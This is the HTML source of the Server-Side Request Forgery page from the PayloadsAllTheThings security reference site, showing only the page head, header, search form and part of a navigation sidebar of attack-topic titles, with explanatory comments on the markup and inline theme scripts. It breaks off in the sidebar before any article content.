PayloadsAllTheThings/Server Side Request Forgery/index.html

<!doctype html>
<html lang="en" class="no-js">
<head>
<!-- Document head: encoding, viewport, page metadata, theme stylesheets and one inline bootstrap script. -->
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<meta name="description" content="Payloads All The Things, a list of useful payloads and bypasses for Web Application Security">
<link rel="canonical" href="https://swisskyrepo.github.io/PayloadsAllTheThings/Server%20Side%20Request%20Forgery/">
<link rel="prev" href="../Server%20Side%20Include%20Injection/">
<link rel="next" href="../Server%20Side%20Template%20Injection/">
<link rel="icon" href="../assets/images/favicon.png">
<!-- The generator tag publishes the exact build-tool versions to every visitor. -->
<meta name="generator" content="mkdocs-1.5.3, mkdocs-material-9.5.15">
<title>Server-Side Request Forgery - Payloads All The Things</title>
<!-- Same-site theme stylesheets; the file names carry a hash-like segment, presumably for cache busting. -->
<link rel="stylesheet" href="../assets/stylesheets/main.7e359304.min.css">
<link rel="stylesheet" href="../assets/stylesheets/palette.06af60db.min.css">
<!-- Third-party origins: the font stylesheet below is fetched from fonts.googleapis.com, and the preconnect
     targets fonts.gstatic.com (presumably where the font files are served). The stylesheet link carries no
     integrity attribute, and a Content-Security-Policy for this page has to allow both origins. -->
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
<!-- Inline style: sets the text and code font custom properties on :root. Like the inline script below,
     it needs a hash or nonce under a Content-Security-Policy that omits 'unsafe-inline'. -->
<style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
<link rel="stylesheet" href="../custom.css">
<!-- Inline bootstrap script defining four globals:
       __md_scope  URL of ".." resolved against the current location
       __md_hash   folds a string into an integer, one character code at a time
       __md_get    JSON.parse of the storage item keyed by scope pathname + "." + key (localStorage by default)
       __md_set    JSON.stringify into the same key; any exception from setItem is swallowed
     Storage is shared by every page on the origin, so callers of __md_get should treat the parsed value as untrusted. -->
<script>__md_scope=new URL("..",location),__md_hash=e=>[...e].reduce((e,_)=>(e<<5)-e+_.charCodeAt(0),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
</head>
<body dir="ltr" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo">
<!-- Two checkbox inputs, ids __drawer and __search; labels elsewhere on the page point at them through
     their for attribute, so the checkboxes can be flipped without script. -->
<input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
<input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
<label class="md-overlay" for="__drawer"></label>
<!-- Skip link: jumps to the in-page anchor #server-side-request-forgery. -->
<div data-md-component="skip">
<a href="#server-side-request-forgery" class="md-skip">
Skip to content
</a>
</div>
<div data-md-component="announce">
</div>
<!-- Page header: logo link, drawer toggle, title, colour-palette switch, search dialog and repository link. -->
<header class="md-header md-header--shadow" data-md-component="header">
<nav class="md-header__inner md-grid" aria-label="Header">
<a href=".." title="Payloads All The Things" class="md-header__button md-logo" aria-label="Payloads All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54Z"/></svg>
</a>
<!-- Label for the __drawer checkbox (the checkbox itself is outside this header). -->
<label class="md-header__button md-icon" for="__drawer">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3V6m0 5h18v2H3v-2m0 5h18v2H3v-2Z"/></svg>
</label>
<div class="md-header__title" data-md-component="header-title">
<div class="md-header__ellipsis">
<div class="md-header__topic">
<span class="md-ellipsis">
Payloads All The Things
</span>
</div>
<div class="md-header__topic" data-md-component="header-topic">
<span class="md-ellipsis">
Server-Side Request Forgery
</span>
</div>
</div>
</div>
<!-- Palette switch: two radio inputs (light "default" scheme, dark "slate" scheme); each label targets the
     other radio, so activating the visible label selects the opposite scheme. The form has no action or
     method; presumably it is never submitted and is driven by script. -->
<form class="md-header__option" data-md-component="palette">
<input class="md-option" data-md-color-media="(prefers-color-scheme: light)" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to dark mode" type="radio" name="__palette" id="__palette_0">
<label class="md-header__button md-icon" title="Switch to dark mode" for="__palette_1" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a4 4 0 0 0-4 4 4 4 0 0 0 4 4 4 4 0 0 0 4-4 4 4 0 0 0-4-4m0 10a6 6 0 0 1-6-6 6 6 0 0 1 6-6 6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12 20 8.69Z"/></svg>
</label>
<input class="md-option" data-md-color-media="(prefers-color-scheme: dark)" data-md-color-scheme="slate" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to light mode" type="radio" name="__palette" id="__palette_1">
<label class="md-header__button md-icon" title="Switch to light mode" for="__palette_0" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 18c-.89 0-1.74-.2-2.5-.55C11.56 16.5 13 14.42 13 12c0-2.42-1.44-4.5-3.5-5.45C10.26 6.2 11.11 6 12 6a6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12 20 8.69Z"/></svg>
</label>
</form>
<!-- Inline script: restores the saved palette. It reads the "__palette" entry through __md_get (a global
     this block does not define) and, when the entry has a color object, copies every key/value pair onto
     <body> as a "data-md-color-" + key attribute. When the saved media value is "(prefers-color-scheme)",
     the values are first taken from whichever radio input matches the current system preference.
     The stored object is used as-is: keys and values are not checked against the schemes declared above.
     setAttribute does not parse markup, so a stored value cannot add elements, but it can set arbitrary
     data-md-color-* attribute values. As an inline script it needs a hash or nonce under a
     Content-Security-Policy that omits 'unsafe-inline'. -->
<script>var media,input,key,value,palette=__md_get("__palette");if(palette&&palette.color){"(prefers-color-scheme)"===palette.color.media&&(media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']"),palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent"));for([key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
<label class="md-header__button md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5Z"/></svg>
</label>
<!-- Search: the container has role="dialog" but no aria-label or aria-labelledby, so the dialog has no
     accessible name. The form declares neither action nor method; presumably the query is handled by
     client-side script, which would then be responsible for escaping whatever it renders into the
     result list below. -->
<div class="md-search" data-md-component="search" role="dialog">
<label class="md-search__overlay" for="__search"></label>
<div class="md-search__inner" role="search">
<form class="md-search__form" name="search">
<input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
<label class="md-search__icon md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5Z"/></svg>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12Z"/></svg>
</label>
<nav class="md-search__options" aria-label="Search">
<!-- tabindex="-1" keeps the Clear button out of the keyboard tab order. -->
<button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12 19 6.41Z"/></svg>
</button>
</nav>
</form>
<div class="md-search__output">
<div class="md-search__scrollwrap" data-md-scrollfix>
<div class="md-search-result" data-md-component="search-result">
<div class="md-search-result__meta">
Initializing search
</div>
<ol class="md-search-result__list" role="presentation"></ol>
</div>
</div>
</div>
</div>
</div>
<!-- Repository link: an absolute https URL to the project on GitHub; no target attribute, so it opens in the current tab. -->
<div class="md-header__source">
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.5.1 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2023 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6zm-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3zm44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9zM244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8zM97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1zm-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7zm32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1zm-11.4-14.7c-1.6 1-1.6 3.6 0 5.9 1.6 2.3 4.3 3.3 5.6 2.3 1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2z"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
</nav>
</header>
<div class="md-container" data-md-component="container">
<main class="md-main" data-md-component="main">
<div class="md-main__inner md-grid">
<div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
<div class="md-sidebar__scrollwrap">
<div class="md-sidebar__inner">
<nav class="md-nav md-nav--primary" aria-label="Navigation" data-md-level="0">
<label class="md-nav__title" for="__drawer">
<a href=".." title="Payloads All The Things" class="md-nav__button md-logo" aria-label="Payloads All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54Z"/></svg>
</a>
Payloads All The Things
</label>
<div class="md-nav__source">
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.5.1 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2023 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6zm-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3zm44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9zM244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8zM97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1zm-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7zm32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1zm-11.4-14.7c-1.6 1-1.6 3.6 0 5.9 1.6 2.3 4.3 3.3 5.6 2.3 1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2z"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href=".." class="md-nav__link">
<span class="md-ellipsis">
Payloads All The Things
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../CONTRIBUTING/" class="md-nav__link">
<span class="md-ellipsis">
CONTRIBUTING
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_3" >
<label class="md-nav__link" for="__nav_3" id="__nav_3_label" tabindex="0">
<span class="md-ellipsis">
API Key Leaks
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_3_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_3">
<span class="md-nav__icon md-icon"></span>
API Key Leaks
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../API%20Key%20Leaks/" class="md-nav__link">
<span class="md-ellipsis">
API Key Leaks
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4" >
<label class="md-nav__link" for="__nav_4" id="__nav_4_label" tabindex="0">
<span class="md-ellipsis">
AWS Amazon Bucket S3
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_4_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_4">
<span class="md-nav__icon md-icon"></span>
AWS Amazon Bucket S3
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../AWS%20Amazon%20Bucket%20S3/" class="md-nav__link">
<span class="md-ellipsis">
Amazon Bucket S3 AWS
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_5" >
<label class="md-nav__link" for="__nav_5" id="__nav_5_label" tabindex="0">
<span class="md-ellipsis">
Account Takeover
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_5_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_5">
<span class="md-nav__icon md-icon"></span>
Account Takeover
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Account%20Takeover/" class="md-nav__link">
<span class="md-ellipsis">
Account Takeover
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_6" >
<label class="md-nav__link" for="__nav_6" id="__nav_6_label" tabindex="0">
<span class="md-ellipsis">
Argument Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_6_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_6">
<span class="md-nav__icon md-icon"></span>
Argument Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Argument%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Argument Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_7" >
<label class="md-nav__link" for="__nav_7" id="__nav_7_label" tabindex="0">
<span class="md-ellipsis">
Business Logic Errors
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_7_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_7">
<span class="md-nav__icon md-icon"></span>
Business Logic Errors
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Business%20Logic%20Errors/" class="md-nav__link">
<span class="md-ellipsis">
Business Logic Errors
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_8" >
<label class="md-nav__link" for="__nav_8" id="__nav_8_label" tabindex="0">
<span class="md-ellipsis">
CICD
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_8_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_8">
<span class="md-nav__icon md-icon"></span>
CICD
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CICD/" class="md-nav__link">
<span class="md-ellipsis">
CI/CD attacks
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_9" >
<label class="md-nav__link" for="__nav_9" id="__nav_9_label" tabindex="0">
<span class="md-ellipsis">
CORS Misconfiguration
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_9_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_9">
<span class="md-nav__icon md-icon"></span>
CORS Misconfiguration
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CORS%20Misconfiguration/" class="md-nav__link">
<span class="md-ellipsis">
CORS Misconfiguration
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10" >
<label class="md-nav__link" for="__nav_10" id="__nav_10_label" tabindex="0">
<span class="md-ellipsis">
CRLF Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_10_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10">
<span class="md-nav__icon md-icon"></span>
CRLF Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CRLF%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Carriage Return Line Feed
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_11" >
<label class="md-nav__link" for="__nav_11" id="__nav_11_label" tabindex="0">
<span class="md-ellipsis">
CSRF Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_11_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_11">
<span class="md-nav__icon md-icon"></span>
CSRF Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CSRF%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Cross-Site Request Forgery
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_12" >
<label class="md-nav__link" for="__nav_12" id="__nav_12_label" tabindex="0">
<span class="md-ellipsis">
CSV Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_12_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_12">
<span class="md-nav__icon md-icon"></span>
CSV Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CSV%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
CSV Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_13" >
<label class="md-nav__link" for="__nav_13" id="__nav_13_label" tabindex="0">
<span class="md-ellipsis">
CVE Exploits
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_13_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_13">
<span class="md-nav__icon md-icon"></span>
CVE Exploits
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CVE%20Exploits/" class="md-nav__link">
<span class="md-ellipsis">
Common Vulnerabilities and Exposures
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../CVE%20Exploits/Log4Shell/" class="md-nav__link">
<span class="md-ellipsis">
CVE-2021-44228 Log4Shell
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_14" >
<label class="md-nav__link" for="__nav_14" id="__nav_14_label" tabindex="0">
<span class="md-ellipsis">
Clickjacking
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_14_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_14">
<span class="md-nav__icon md-icon"></span>
Clickjacking
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Clickjacking/" class="md-nav__link">
<span class="md-ellipsis">
Clickjacking: Web Application Security Vulnerability
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_15" >
<label class="md-nav__link" for="__nav_15" id="__nav_15_label" tabindex="0">
<span class="md-ellipsis">
Command Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_15_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_15">
<span class="md-nav__icon md-icon"></span>
Command Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Command%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Command Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_16" >
<label class="md-nav__link" for="__nav_16" id="__nav_16_label" tabindex="0">
<span class="md-ellipsis">
DNS Rebinding
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_16_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_16">
<span class="md-nav__icon md-icon"></span>
DNS Rebinding
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../DNS%20Rebinding/" class="md-nav__link">
<span class="md-ellipsis">
DNS Rebinding
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_17" >
<label class="md-nav__link" for="__nav_17" id="__nav_17_label" tabindex="0">
<span class="md-ellipsis">
Dependency Confusion
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_17_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_17">
<span class="md-nav__icon md-icon"></span>
Dependency Confusion
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Dependency%20Confusion/" class="md-nav__link">
<span class="md-ellipsis">
Dependency Confusion
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_18" >
<label class="md-nav__link" for="__nav_18" id="__nav_18_label" tabindex="0">
<span class="md-ellipsis">
Directory Traversal
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_18_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_18">
<span class="md-nav__icon md-icon"></span>
Directory Traversal
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Directory%20Traversal/" class="md-nav__link">
<span class="md-ellipsis">
Directory Traversal
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_19" >
<label class="md-nav__link" for="__nav_19" id="__nav_19_label" tabindex="0">
<span class="md-ellipsis">
Dom Clobbering
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_19_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_19">
<span class="md-nav__icon md-icon"></span>
Dom Clobbering
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Dom%20Clobbering/" class="md-nav__link">
<span class="md-ellipsis">
Dom Clobbering
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_20" >
<label class="md-nav__link" for="__nav_20" id="__nav_20_label" tabindex="0">
<span class="md-ellipsis">
File Inclusion
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_20_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_20">
<span class="md-nav__icon md-icon"></span>
File Inclusion
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../File%20Inclusion/" class="md-nav__link">
<span class="md-ellipsis">
File Inclusion
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_21" >
<label class="md-nav__link" for="__nav_21" id="__nav_21_label" tabindex="0">
<span class="md-ellipsis">
Google Web Toolkit
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_21_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_21">
<span class="md-nav__icon md-icon"></span>
Google Web Toolkit
